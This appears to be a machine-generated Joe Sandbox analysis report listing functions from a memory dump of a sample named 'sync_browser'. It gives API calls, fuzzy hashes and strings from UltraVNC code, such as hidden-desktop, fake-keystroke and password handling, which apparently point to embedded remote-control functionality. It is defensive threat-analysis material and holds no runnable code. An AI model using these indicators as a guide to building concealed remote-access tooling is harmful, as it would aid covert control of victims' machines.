                                                                      • Opcode ID: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                      • Instruction ID: 6df191bf710de3a735ffe54125a7510d40d65f8dea9f4bc02cf4e34e00f50312
                                                                      • Opcode Fuzzy Hash: c4fdc54b808940450c7e6836e95b05b7c8ed45843037277cd8a2a281f8498f58
                                                                      • Instruction Fuzzy Hash: 4B010872504B45C2D7109F25F9941A8B3F8FB58F98B541136CA8D87768DF38C8A5C750
                                                                      Function 00007FF7E512B6F0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: __doserrno_errno
                                                                      • String ID:
                                                                      • API String ID: 921712934-0
                                                                      • Opcode ID: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                      • Instruction ID: 8eef23896052169dc116dcd631427639805b94cae9f58b54ea524eb132ce8dfa
                                                                      • Opcode Fuzzy Hash: d406b4a9bfd038921951594095831198988d57d612f0112f0ddf710c3ea7d616
                                                                      • Instruction Fuzzy Hash: AF01A26AE0C68EC1EA057B54B46137CE1609F52F22FD14333D62D863DACE7C6000A332
                                                                      Function 00007FF7E5093220 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96networkCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: gethostbynamesprintf
                                                                      • String ID: %d.$IP address unavailable
                                                                      • API String ID: 4032199589-2983120142
                                                                      • Opcode ID: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                      • Instruction ID: c7380cf0d9304f8f8387ece05364bbe90a06e625fac7383173f0d67cb971bd66
                                                                      • Opcode Fuzzy Hash: 1844eddde6bdd16f9ed8f1280075efd27ff06d6aa399f9eaa6a91d19b8d539c6
                                                                      • Instruction Fuzzy Hash: 34419725614A8985D620DB29B45026AE760FB85FF4F845336EE6E83BD9DF3CD0418711
                                                                      Function 00007FF7E50A08E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LoadCursorA.USER32 ref: 00007FF7E50A0925
                                                                        • Part of subcall function 00007FF7E509D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7E509D95E
                                                                        • Part of subcall function 00007FF7E509D930: InitializeCriticalSection.KERNEL32 ref: 00007FF7E509D9EB
                                                                        • Part of subcall function 00007FF7E509D930: LoadLibraryA.KERNEL32 ref: 00007FF7E509DA0D
                                                                        • Part of subcall function 00007FF7E509D930: GetProcAddress.KERNEL32 ref: 00007FF7E509DA30
                                                                        • Part of subcall function 00007FF7E509D930: LoadLibraryA.KERNEL32 ref: 00007FF7E509DA51
                                                                        • Part of subcall function 00007FF7E509D930: GetProcAddress.KERNEL32 ref: 00007FF7E509DA6D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Load$AddressCriticalInitializeLibraryProcSection$Cursormalloc
                                                                      • String ID: vncDesktopSW.cpp : SWinit $vncdesktop.cpp : failed to start hook thread$vncdesktop.cpp : initialising desktop handler
                                                                      • API String ID: 2513085289-3031267129
                                                                      • Opcode ID: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                                      • Instruction ID: 2a52a824845e924255e0fedfcf6ca7f857c8cb63e6eaa449e84aad98eb476f06
                                                                      • Opcode Fuzzy Hash: e487d388fed18aea2260250da6f24d23774b770b27bbd1d7d67b117f7b2f2a02
                                                                      • Instruction Fuzzy Hash: 5F215131604BC992F618AB60E5102E9E364FB44F50F944536D75D97799DF3CE025C321
                                                                      Function 00007FF7E50DA130 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DesktopInputOpen
                                                                      • String ID: Default
                                                                      • API String ID: 601053899-753088835
                                                                      • Opcode ID: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                      • Instruction ID: ebb162eedd47248bfa3e60ad8c825259033490e74fbd68b4613bf9f213e65ff5
                                                                      • Opcode Fuzzy Hash: 70adbaaf15933b6300e773d9a6368acce56cf68ba5067fbfdfb46543feca4f4b
                                                                      • Instruction Fuzzy Hash: 49216239A1868A82E721EB15B4657BAA390FB89B44FC40036DA8D83658DF3CD114CB11
                                                                      Function 00007FF7E507A830 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x), xrefs: 00007FF7E507A89F
                                                                      • HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x, xrefs: 00007FF7E507A8B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to restore SPI value for 0x%04x (0x%08x)$HideDesktop.cpp : Restored SPI value for 0x%04x to 0x%08x
                                                                      • API String ID: 2777246624-1049114938
                                                                      • Opcode ID: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                      • Instruction ID: 018b6ecf818567f8a93d5000dfd11f926de64163ce3edbb42d11fe59f145a592
                                                                      • Opcode Fuzzy Hash: cfadfbb5a052f751d6cf6726dcbde3c23d3e636a514a63c68ec439c87cd35a12
                                                                      • Instruction Fuzzy Hash: 1E218631A0868A86E714EF21F410375B7A0FB44B48F840136EA4E97658DF3CE555C711
                                                                      Function 00007FF7E50C02A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Virtual
                                                                      • String ID: fake %d down$fake %d up
                                                                      • API String ID: 4278518827-2496597273
                                                                      • Opcode ID: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                      • Instruction ID: 64e49cecba077364dc699300114d6723ae55e9533699c237e0f61b9400f40eb2
                                                                      • Opcode Fuzzy Hash: 2dd47c5dbc9ba7f1d5e19d4c12577b772ebabe815dd6ee617f8e27d02d3a68ea
                                                                      • Instruction Fuzzy Hash: ED01E522F0928582E724A736A06027DAB91AB84F04FD88436E54D83399DE3CD446C722
                                                                      Function 00007FF7E507A550 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$InfoLoadParametersSystem$AddressCloseFreeOpenProcQueryValue
                                                                      • String ID: HideDesktop.cpp : Killwallpaper %i$HideDesktop.cpp : Killwallpaper %i %i
                                                                      • API String ID: 542764273-2415377678
                                                                      • Opcode ID: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                      • Instruction ID: 5e7754c6483cf0a439051044e09976bfd319ecda04d8f72b69c647f7e4003d4c
                                                                      • Opcode Fuzzy Hash: 3ec6b93350797b567c00662e8f9584999f15a8dea8e11121c3388c2c253eb506
                                                                      • Instruction Fuzzy Hash: EE015B7190858B96F610BB20F8207B5A360FF94B08FC04037E90D97569DE3CA21AC773
                                                                      Function 00007FF7E50DA220 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30threadCOMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProcessWindow$CurrentFindThread
                                                                      • String ID: WinVNC Tray Icon
                                                                      • API String ID: 1332243453-1071638575
                                                                      • Opcode ID: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                      • Instruction ID: f3fbf92c9e6d1b592a5dee656355154c38aa0a2993d3065450ef2e1e78b4d9b6
                                                                      • Opcode Fuzzy Hash: 1aaacc56bcc0b6efd1821309f0f7cb6d3b786fcd9035491e51b5987c9fdb7900
                                                                      • Instruction Fuzzy Hash: 6AF03631A1C74582DF945B66B451579A250FF88FC4FC42037EA5E86758EF3CD485C711
                                                                      Function 00007FF7E50922C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • malloc.LIBCMT ref: 00007FF7E5092328
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CAD
                                                                        • Part of subcall function 00007FF7E5128C34: _errno.LIBCMT ref: 00007FF7E5128CB8
                                                                      • free.LIBCMT ref: 00007FF7E5092564
                                                                      • free.LIBCMT ref: 00007FF7E5092617
                                                                        • Part of subcall function 00007FF7E5128BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C0A
                                                                        • Part of subcall function 00007FF7E5128BF4: _errno.LIBCMT ref: 00007FF7E5128C14
                                                                        • Part of subcall function 00007FF7E5128BF4: GetLastError.KERNEL32(?,?,?,00007FF7E512748C), ref: 00007FF7E5128C1C
                                                                      Strings
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF7E509230B
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _errno$Heapfree$AllocErrorFreeLast_callnewhmalloc
                                                                      • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called
                                                                      • API String ID: 1063416079-2438250478
                                                                      • Opcode ID: 35055a67cd95e2491fb3900131c2109903ea622cf7e3b396c5ad9548882c2784
                                                                      • Instruction ID: 3aefd172c6d9fa848a1d221c951ad64645aa95ee54edce5966a654c9cd27e8fe
                                                                      • Opcode Fuzzy Hash: 35055a67cd95e2491fb3900131c2109903ea622cf7e3b396c5ad9548882c2784
                                                                      • Instruction Fuzzy Hash: 5EA1A226704A9584EB50EB3AD4643AD6361FB84FA8F548332EE2E977E9DF38C445C311
                                                                      Function 00007FF7E509A580 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 152COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      • i, xrefs: 00007FF7E509A754
                                                                      • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set, xrefs: 00007FF7E509A5D6
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$EnterLeave
                                                                      • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncencodemgr.h : GetPalette called but no encoder set
                                                                      • API String ID: 3168844106-2727237473
                                                                      • Opcode ID: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                      • Instruction ID: fb7fde83c8fa77ce3b4910d25e1d711d15f10e8e153aa1890401d4c841c165e6
                                                                      • Opcode Fuzzy Hash: b9736aa724b34d719d3600d22d7a269a865bd43a142573cc82961d05dd0f907a
                                                                      • Instruction Fuzzy Hash: 276125227087C995E774AF29A5143BAA7A0FB86B54F840136EE9D837C9DF3CD484C712
                                                                      Function 00007FF7E5138704 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$CountEnterInitializeSpin_amsg_exit_lockfree
                                                                      • String ID:
                                                                      • API String ID: 3786353176-0
                                                                      • Opcode ID: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                      • Instruction ID: e52139d4bdcceef2e62dd282aca01049c637861ded058568f2f6ca65c5cb1119
                                                                      • Opcode Fuzzy Hash: f31a3eaa8913d2083ee82d7d02934215533fd9c0c8c7a5b9e183bd6558d9460c
                                                                      • Instruction Fuzzy Hash: E3418F3AA19A4A82EB10AB15F4B433CA761FF54F94F964537CA4D872A9CF3CD410D322
                                                                      Function 00007FF7E507C590 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 82COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • malloc.LIBCMT ref: 00007FF7E507C5D4
                                                                        • Part of subcall function 00007FF7E5128C34: _FF_MSGBANNER.LIBCMT ref: 00007FF7E5128C64
                                                                        • Part of subcall function 00007FF7E5128C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF7E513329C,?,?,?,00007FF7E5137749,?,?,?,00007FF7E51377F3), ref: 00007FF7E5128C89
                                                                        • Part of subcall function 00007FF7E5128C34: _callnewh.LIBCMT ref: 00007FF7E5128CA2
